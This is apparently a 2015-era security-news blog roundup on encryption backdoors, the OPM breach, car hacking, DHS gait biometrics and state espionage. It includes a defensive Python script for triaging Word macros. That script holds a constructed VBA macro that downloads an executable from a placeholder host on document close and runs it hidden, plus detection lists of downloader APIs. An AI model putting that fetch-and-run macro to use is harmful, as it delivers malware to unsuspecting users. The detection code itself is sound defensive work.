The U.S. Can’t Keep Its Own Data Safe, How Dare It Demand a Back Door to Yours

The US government seemingly has a penchant for being unable to keep its own data safe, so why should the American people trust it with a backdoor into yours? (emphasis added)

The U.S. intelligence apparatus still wants a key to your private data. Specifically, it wants “backdoor,” or “exceptional,” access to encrypted data when a court order is obtained for it. Last week, the nation’s intelligence heads—FBI Director James Comey, CIA Director John Brennan, Director of National Intelligence James Clapper, National Security Agency Director Michael Rogers, and Defense Intelligence Agency Director Vincent Stewart—went before the House Intelligence Committee to lay out the threats and make their asks. After raising the specter of crippling large-scale cyberattacks, Clapper said the more pressing concern was persistent, ongoing small attacks, or as Foreign Policy put it, “Get Ready for Everything to Be Hacked All the Time.” To fight these attacks, Clapper wants streamlined access to the private accounts of Americans—an idea that is unnecessary at best and counterproductive at worst. And the intelligence leaders’ bad ideas didn’t end there.

While the increasing regularity of both computing and security breaches makes Clapper’s concerns very real, the approach the intelligence agencies want to take is sorely inadequate. While they spent a long time discussing deterrence and surveillance, Clapper et al. practically ignored the most crucial and central aspect of fighting cyberattacks: security. In light of the recent, catastrophic Office of Personnel Management data breach, which compromised the sensitive personal data of more than 20 million people, Clapper’s sense of priorities, as evidenced by his refusal to call the OPM breach an “attack,” is clearly warped. (“There was no destruction of data or manipulation of data,” he said. “It was simply stolen.”) If sensitive information is a house, then the government wants surveillance cameras everywhere and stiff sentences for thieves, yet can’t be bothered to lock the door.

Instead, Clapper and Comey stressed the need for greater deterrence of cyberattacks: not securing systems, but creating incentives against hacking. Regarding the OPM breach, Clapper said, “Until such time as we do create both the substance and the mindset of deterrence, this sort of thing is going to continue.” There are two things wrong with this statement. First, it’s not easy to attribute these attacks to their perpetrators. Even if the U.S. government is convinced that the OPM attacks originated from China, it likely hasn’t figured out whether they were state-sponsored. The government’s attribution of last year’s Sony Pictures hack to North Korea remains dubious and inconclusive, as I pointed out shortly before everyone forgot about it. In the absence of reliable attribution, deterrence is impossible, because the actor will always have plausible deniability.

According to John McAfee, Cyberwar Is Here, and China Is the Enemy

According to John McAfee, cyberwar[sic] is here, and China is the enemy:

We have to get a clue. We are in the early stages of a cyberwar. As a candidate for President of the very nation under attack, I would be remiss in my duties if I did not shed light on our reality.

I am going to make the following prediction:

On September 25, when Xi Jinping meets President Obama, we will not have a single concrete response to the war that has been declared on us by the Chinese. By “concrete” I mean economic sanctions that take place on the 25th, or other immediate, visible actions. Our president is smart enough to know that the Chinese will merely laugh at any threat of “future” actions, such as “next week we are going to…”

The Chinese have been involved in diplomatic relations for 5,000 years. The U.S. has only existed for less than 250 years. Guess which nation has the advantage here. Any announcement that does not include “starting today, no Chinese cargo ship will be allowed in any U.S. port,” or something of similar magnitude, will be seen by the Chinese as confirmation of our idiocy.

If this sounds extreme, then wake up. We are at war.

Well, there you have it. Since Mr. John McAfee, presidential candidate, thinks so, I guess the US government needs to get right on it!

Operational Military Commanders Are Finally Beginning to Understand Their Gaps and Weaknesses in Cyber Security

After many years of watching senior leadership ignore cyber, operational military commanders are finally beginning to understand their gaps and weaknesses in cyber security, and the impact this has on mission readiness and effectiveness:

“While we’ve held a decisive and dominant advantage in all the other domains, that’s not necessarily the case in the cyber domain,” Brig. Gen. Robert Skinner, deputy commander of the Joint Force Headquarters-DoD Information Networks, told a conference on Thursday.

“The cost of entry in this domain is very minimal, which enables individuals or groups to generate effects that take a significant expenditure of resources to respond to. The value curve is in the wrong direction,” he added.

Skinner’s department was launched in January to shoulder some of the responsibility for cyber operations in the Defense Department.

“We are conducting thousands of defensive operations each and every day … and countering millions of cyberattacks annually,” Skinner said. “We are in constant contact with agile, learning adversaries in cyberspace, and their learning curve has turned upside down.”

Additionally, officials said, the integration of technology, bureaucracy and personnel represents a challenge for the U.S., even as cyberattacks grow.

Lt. Gen. Ed Cardon, the leader of Army Cyber Command, said, “If [we] have all these technologies, but you can’t connect these to a command operation, how are we going to integrate all this stuff so that it accomplishes an effect?”

DHS Is Funding a Boeing Project for Enhanced Biometrics to Be Used as a Means for Device Self-Destruction

DHS is funding a Boeing project that uses enhanced biometrics to trigger device self-destruction once the device detects that it is no longer being used by its owner:

The technology powering the devices potentially could identify the user’s walking style, for example. Officials would be alerted if the gait does not match the authorized user’s walk – a red flag the phone might have fallen into the wrong hands, officials said.

The “secret sauce” of the mobile device is a so-called neuromorphic computer chip that simulates human learning, Vincent Sritapan, the program manager for DHS’ mobile device security program, told Nextgov.

Gait recognition — driven by the phone’s accelerometer, GPS and the chip — is but one of many kinds of continuous ID verification intended to tighten access controls on mobile devices.

Boeing and HRL Laboratories, a software firm jointly owned by Boeing and General Motors, are partnering under a DHS project worth $2.2 million over 2.5 years.

The companies “pretty much are leveraging user behavior information” from data gathered by sensors found on any standard consumer smartphone, Sritapan said. Those feelers could include microphones, cameras and touchpads, he added. The artificial intelligence could help agencies determine, “Are you who you say you are, and do we give you access to enterprise resources like email?” he said.

This sounds quite intriguing.
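As an added example (not code from the DHS/Boeing project or from the article), here is a minimal continuous gait check in Python: the phone enrolls the owner's walk from a few accelerometer windows, then judges every later window as a match, a mismatch, or insufficient evidence. The two features (step period from autocorrelation, motion amplitude), the thresholds, the sample rate and the synthetic accelerometer traces are all constructed assumptions; a production system would use far richer models, which is what the neuromorphic chip in the quote is for.

```python
import math
import random

# All constants below are assumptions for this illustration, not values from the DHS/Boeing project.
SAMPLE_RATE_HZ = 32              # accelerometer rate
WINDOW = 2 * SAMPLE_RATE_HZ      # one decision every 2 s of samples
MIN_LAG, MAX_LAG = 8, 40         # plausible step periods in samples (0.25 s .. 1.25 s)
MOTION_FLOOR = 0.5               # std (m/s^2) below which nobody is walking with the phone
Z_LIMIT = 3.0                    # per-feature tolerance, in template standard deviations
TOL_FLOOR = {"period": 1.0, "amplitude": 0.15}  # keeps a very tight template from being brittle


def step_period(window):
    """Dominant step period in samples: peak of the mean-removed, biased autocorrelation."""
    n = len(window)
    mean = sum(window) / n
    x = [v - mean for v in window]
    best_lag, best_val = MIN_LAG, -math.inf
    for lag in range(MIN_LAG, MAX_LAG + 1):
        acf = sum(x[i] * x[i + lag] for i in range(n - lag)) / n
        if acf > best_val:
            best_lag, best_val = lag, acf
    return best_lag


def gait_features(window):
    """Two coarse gait features: step period (samples) and motion amplitude (std, m/s^2)."""
    n = len(window)
    mean = sum(window) / n
    std = math.sqrt(sum((v - mean) ** 2 for v in window) / n)
    return {"period": float(step_period(window)), "amplitude": std}


def enroll(windows):
    """Owner template: per-feature mean and tolerance over several enrollment windows."""
    feats = [gait_features(w) for w in windows]
    template = {}
    for name in ("period", "amplitude"):
        vals = [f[name] for f in feats]
        mu = sum(vals) / len(vals)
        sd = math.sqrt(sum((v - mu) ** 2 for v in vals) / len(vals))
        template[name] = (mu, max(sd, TOL_FLOOR[name]))
    return template


def verify(template, window):
    """Continuous check of one window: 'match', 'mismatch' or 'insufficient'.

    'insufficient' covers the stationary phone: with no gait to compare there is no
    evidence either way, so the caller should fall back to another factor rather than
    treat silence as a mismatch and lock the owner out.
    """
    f = gait_features(window)
    if f["amplitude"] < MOTION_FLOOR:
        return "insufficient"
    for name, (mu, tol) in template.items():
        if abs(f[name] - mu) / tol > Z_LIMIT:
            return "mismatch"
    return "match"


def synth_walk(period, amplitude, noise, n=WINDOW, seed=0):
    """Constructed accelerometer magnitude trace: gravity + periodic step component + noise."""
    rng = random.Random(seed)
    return [9.81 + amplitude * math.sin(2 * math.pi * i / period) + rng.gauss(0, noise)
            for i in range(n)]


OWNER = dict(period=16, amplitude=2.0, noise=0.2)     # constructed: the owner's walk
IMPOSTOR = dict(period=22, amplitude=3.5, noise=0.2)  # constructed: someone else's walk


def demo():
    """Enroll the owner, then judge three windows: owner, impostor, phone lying still."""
    template = enroll([synth_walk(seed=s, **OWNER) for s in range(5)])
    return {
        "owner": verify(template, synth_walk(seed=99, **OWNER)),
        "impostor": verify(template, synth_walk(seed=99, **IMPOSTOR)),
        "still": verify(template, synth_walk(period=16, amplitude=0.0, noise=0.05, seed=1)),
    }


if __name__ == "__main__":
    print(demo())
```

A mismatch should step the user up to a PIN or other factor before anything as drastic as a wipe: a new pair of shoes or a bag on the other shoulder shifts gait features too, and a self-destruct that fires on a false reject is a denial of service against the owner.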

OPM Breach Exposed Fingerprints of 5.6 Million US Government Employees

Another week, another round of bad news about the OPM breach. This time we learn the fingerprints of 5.6 million US government employees were exfiltrated by the ostensibly Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Huge Surge in Targeted Cyber Attacks in Japan in 2015

According to a report by the Japanese National Police Agency, there was a huge surge in targeted cyber attacks in Japan in 2015:

The National Police Agency said it recorded 1,472 attacks from January to June, NHK news agency reported.

The agency monitors such attacks in coordination with more than 6,900 defence and nuclear-related firms and others, which are the main targets.

In targeted attacks, emails carrying computer viruses are sent to companies and government offices in a bid to steal classified information. Typically, the virus is hidden in an attached file sent with the e-mail.

The agency said cases in which a Microsoft Word document was used to automatically download an illicit programme accounted for 64 percent of all incidents involving attached files. That’s up from two percent last year.

Two US Senators Are Asking Automobile Manufacturers for Details on Their Cyber Security Strategies

Ever since the proof-of-concept hack against the Jeep, automobile cyber security has been on people’s minds. This time two US senators are asking automobile manufacturers for details on their cyber security strategies:

Two U.S. senators have asked the world’s biggest automakers for information on steps they have taken to protect cars from being hacked, as attention on vehicle security has surged following the first car recall over a cyber bug.

Democratic Senators Edward Markey and Richard Blumenthal wrote to 18 automakers on Wednesday asking about efforts taken to secure vehicles including 2015 and 2016 models. They asked automakers how they test electronic components and communications systems to ensure attackers cannot gain access to onboard networks.

Concerns about auto cyber security have grown since July, when researchers gained remote control of a moving Jeep, prompting Fiat Chrysler Automobiles (FCAU.N) (FCHA.MI) to recall some 1.4 million vehicles for a software update.

The request from the senators follows a review that Markey began in December 2013. He concluded in a February 2015 report that the spread of technology connecting vehicles to networks had outpaced industry and government efforts to protect vehicles from hackers.

The senators said they want to know what automakers have done since the last survey to beef up security.

Lawmakers Accuse DHS of Stonewalling on Cyber Security Plans

In the this-is-not-a-surprise department, lawmakers accuse DHS of stonewalling on cyber security plans:

“The department has persisted in its ‘go it alone’ mentality and has ignored Congress’ requests for information despite a record that demonstrates its need for oversight and accountability,” added Rep. John Ratcliffe (R-Texas), who chairs the panel’s subcommittee on cybersecurity, infrastructure protection and security technologies.

The DHS has played an increasingly important role in the government’s cybersecurity effort over the last year.

Congress late last year passed a series of bills that strengthened the agency’s cyber workforce and codified certain aspects of the DHS cybersecurity mission.

Lawmakers are currently considering more bills that would further clarify the agency’s cyber role while strengthening its authority to proactively investigate and defend federal networks across the government.

The House Homeland Security Committee is also drafting a bill that would transform the NPPD.

McCaul said the committee would soon hold hearings as lawmakers work to draft the legislation.

“We welcome the department’s input and look forward to working closely with them on streamlining NPPD’s structure,” he said.

The committee’s bill would rename the NPPD to Cybersecurity and Infrastructure Protection. It would also create two positions to oversee the new wing: a deputy undersecretary for cybersecurity and a deputy undersecretary for infrastructure protection.

China May Have Conducted a Cyber Attack Against the Russian Military

Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any type,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard technique, yet it is effective at evading endpoint anti-virus: the document carries no malicious binary, only a macro that fetches one, and a close-time trigger sidesteps sandboxes that only watch the open event. This is why layered defenses have to extend beyond the network perimeter to the endpoint itself. Application whitelisting, host intrusion prevention, and desktop firewalls, used together, greatly reduce the chance that this kind of malware executes successfully: whitelisting keeps the downloaded stage from running, host intrusion prevention can stop Word from spawning it, and the desktop firewall can deny the download in the first place.
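Both the Japanese NPA figure above (Word documents used to auto-download a program in 64 percent of attachment incidents) and Epstein’s description come down to the same artifact: a Word container carrying a VBA project with an auto-run entry point and a download capability. As an added example, not code from either article or from this blog, the Python below triages such a document at a mail gateway and treats close-time triggers as the anti-sandbox signal the text describes. The trigger and downloader-hint lists are my assumptions, the sample document is constructed, and its vbaProject.bin holds raw module text rather than the real OLE container with MS-OVBA-compressed streams, so on real files this plain string search is only a heuristic; use olevba from oletools, which parses the OLE file and decompresses the modules, for anything beyond a first pass.

```python
import io
import zipfile

MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"

# Word VBA auto-run entry points. The close-time ones are the trick described in the text: the
# payload fires after the reader has finished with the decoy, when many sandboxes have stopped watching.
OPEN_TRIGGERS = ("AutoOpen", "Document_Open", "AutoExec", "AutoNew", "Document_New")
CLOSE_TRIGGERS = ("AutoClose", "Document_Close", "AutoExit")
# Capabilities typical of a downloader stage (assumed list; extend it from your own corpus)
DOWNLOADER_HINTS = ("URLDownloadToFile", "MSXML2.XMLHTTP", "WinHttp.WinHttpRequest",
                    "ADODB.Stream", "WScript.Shell", "Shell(", "powershell")


def _contains(blob, needle):
    """Case-insensitive search for an identifier as ASCII or UTF-16LE (both occur in VBA streams)."""
    b = blob.lower()
    n = needle.lower()
    return n.encode("ascii") in b or n.encode("utf-16-le") in b


def triage(doc_bytes):
    """Inspect an OOXML Word container: macro presence, auto-run triggers, downloader hints."""
    report = {"has_macro": False, "macro_content_type": False,
              "open_triggers": [], "close_triggers": [], "downloader_hints": []}
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" in names:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            report["macro_content_type"] = MACRO_CONTENT_TYPE in types_xml
        # Find the VBA project by part name, whatever the file extension claims
        blobs = [zf.read(n) for n in names if n.lower().endswith("vbaproject.bin")]
    if not blobs:
        return report
    report["has_macro"] = True
    blob = b"".join(blobs)
    report["open_triggers"] = [t for t in OPEN_TRIGGERS if _contains(blob, t)]
    report["close_triggers"] = [t for t in CLOSE_TRIGGERS if _contains(blob, t)]
    report["downloader_hints"] = [h for h in DOWNLOADER_HINTS if _contains(blob, h)]
    return report


def verdict(report):
    """Gateway decision from the triage report."""
    if not report["has_macro"]:
        return "no-macro"
    auto_run = report["open_triggers"] or report["close_triggers"]
    if report["close_triggers"] and report["downloader_hints"]:
        return "block: close-triggered downloader"
    if auto_run and report["downloader_hints"]:
        return "block: auto-run downloader"
    if auto_run:
        return "review: auto-run macro"
    return "review: macro present"


def build_sample(vba_source=None):
    """Constructed OOXML container for testing. A real vbaProject.bin is an OLE file whose module
    streams are MS-OVBA compressed; here the module text is stored raw, as it looks once a tool
    such as olevba has decompressed it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = MACRO_CONTENT_TYPE if vba_source else PLAIN_CONTENT_TYPE
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" ContentType="{ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if vba_source:
            zf.writestr("word/vbaProject.bin", vba_source.encode("ascii"))
    return buf.getvalue()


# Constructed macro in the shape the article describes: the decoy reads normally, the payload runs on close.
DECOY_MACRO = """
Sub Document_Close()
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    ' stage 2 is fetched only after the reader closes the decoy article
    URLDownloadToFile 0, "http://stage2.invalid/update.exe", "C:\\Users\\Public\\update.exe", 0, 0
    Shell "C:\\Users\\Public\\update.exe", vbHide
End Sub
"""

if __name__ == "__main__":
    for label, doc in (("decoy", build_sample(DECOY_MACRO)), ("plain", build_sample())):
        print(label, verdict(triage(doc)))
```

The check looks for the VBA part inside the container rather than trusting the extension, and a gateway verdict is only one layer: the endpoint controls above still have to catch the stage that a macro nobody flagged goes on to download.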

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?

Seven Years of Malware Linked to Russian State-Backed Cyber-Espionage Group

An apparently state-backed cyber-espionage group based in Russia has conducted a series of targeted malware campaigns against foreign governments over the past seven years:

For the past seven years, a cyber-espionage group operating out of Russia—and apparently at the behest of the Russian government—has conducted a series of malware campaigns targeting governments, political think tanks, and other organizations. In a report issued today, researchers at F-Secure provided an in-depth look at an organization labelled by them as “the Dukes,” which has been active since at least 2008 and has evolved into a methodical developer of “zero-day” attacks, pulling together their own research with the published work of other security firms to provide a more detailed picture of the people behind a long-running family of malware.

Characterized by F-Secure researchers as a “well resourced, highly dedicated and organized cyberespionage group,” the Dukes have mixed wide-spanning, blatant “smash and grab” attacks on networks with more subtle, long-term intrusions that harvested massive amounts of data from their targets, which range from foreign governments to criminal organizations operating in the Russian Federation. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors,” the F-Secure team wrote. “Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The first known targets of the Dukes’ earliest-detected malware, known as PinchDuke, were associated with the Chechen separatist movement. By 2009 the Dukes were going after Western governments and organizations in search of information about the diplomatic activities of the United States and the North Atlantic Treaty Organization. While most of the attacks have used spear phishing e-mails as the means of injecting malware onto targeted systems, one of their attacks has spread malware through a malicious Tor exit node in Russia, targeting users of the anonymizing network with malware injections into their downloads.